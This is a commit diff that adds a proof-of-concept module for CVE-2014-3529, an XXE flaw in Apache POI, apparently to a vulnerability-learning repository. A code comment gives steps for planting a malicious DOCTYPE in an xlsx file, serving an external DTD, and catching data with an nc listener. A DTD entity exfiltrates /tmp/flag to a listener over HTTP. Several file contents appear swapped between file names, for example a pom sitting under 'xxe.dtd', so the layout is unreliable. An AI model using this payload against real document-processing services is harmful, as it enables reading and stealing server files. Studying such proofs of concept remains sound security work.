feat:add apache-poi

Author: “threedr3am”

apache-poi/cve-2014-3529/pom.xml

@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+  <parent>
+    <artifactId>apache-poi</artifactId>
+    <groupId>com.xyh</groupId>
+    <version>1.0-SNAPSHOT</version>
+  </parent>
+  <modelVersion>4.0.0</modelVersion>
+
+  <artifactId>cve-2014-3529</artifactId>
+
+  <dependencies>
+    <!-- https://mvnrepository.com/artifact/org.apache.poi/poi-ooxml -->
+    <dependency>
+      <groupId>org.apache.poi</groupId>
+      <artifactId>poi-ooxml</artifactId>
+      <version>3.10-FINAL</version>
+    </dependency>
+  </dependencies>
+
+</project>

apache-poi/cve-2014-3529/src/main/java/com/threedr3am/bug/poi/CVE_2014_3529.java

@@ -0,0 +1,27 @@
+package com.threedr3am.bug.poi;
+
+import java.io.IOException;
+import org.apache.poi.EncryptedDocumentException;
+import org.apache.poi.ss.usermodel.Sheet;
+import org.apache.poi.ss.usermodel.Workbook;
+import org.apache.poi.ss.usermodel.WorkbookFactory;
+
+/**
+ * 1. unzip test.xlsx
+ * 2. vim [Content_Types].xml，line-2 insert (  <!DOCTYPE note [<!ENTITY % file SYSTEM "file:///tmp/flag"><!ENTITY % remote SYSTEM "http://127.0.0.1:23234/xxe.dtd">%remote;%all;]><root>&send;</root>  )
+ * 3. zip -r 0 test.xlsx ./*
+ * 4. echo "threedr3am" > /tmp/flag
+ * 5. nc -lvvp 23235
+ * 6. cp xxe.dtd /tmp/poi/xxe.dtd & cd /tmp/poi/ & python -m SimpleHTTPServer 23234
+ *
+ * @author threedr3am
+ */
+public class CVE_2014_3529 {
+
+    public static void main(String[] args)
+        throws IOException, EncryptedDocumentException, org.apache.poi.openxml4j.exceptions.InvalidFormatException {
+        Workbook wb1 = WorkbookFactory.create(CVE_2014_3529.class.getClassLoader().getResourceAsStream("test.xlsx"));
+        Sheet sheet = wb1.getSheetAt(0);
+        System.out.println(sheet.getLastRowNum());
+    }
+}

apache-poi/cve-2014-3529/src/main/resources/test.xlsx

@@ -0,0 +1 @@
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:23235?file=%file;' >">

apache-poi/cve-2014-3529/src/main/resources/xxe.dtd

@@ -0,0 +1,18 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+  <parent>
+    <artifactId>learn-java-bug</artifactId>
+    <groupId>com.xyh</groupId>
+    <version>1.0-SNAPSHOT</version>
+  </parent>
+  <modelVersion>4.0.0</modelVersion>
+
+  <artifactId>apache-com.threedr3am.bug.poi</artifactId>
+  <packaging>pom</packaging>
+  <modules>
+    <module>cve-2014-3529</module>
+  </modules>
+
+</project>

apache-poi/pom.xml

@@ -25,6 +25,7 @@
     <module>ShardingSphere-UI</module>
     <module>shiro</module>
     <module>nexus</module>
+    <module>apache-poi</module>
   </modules>
 
   <name>learn-java-bug</name>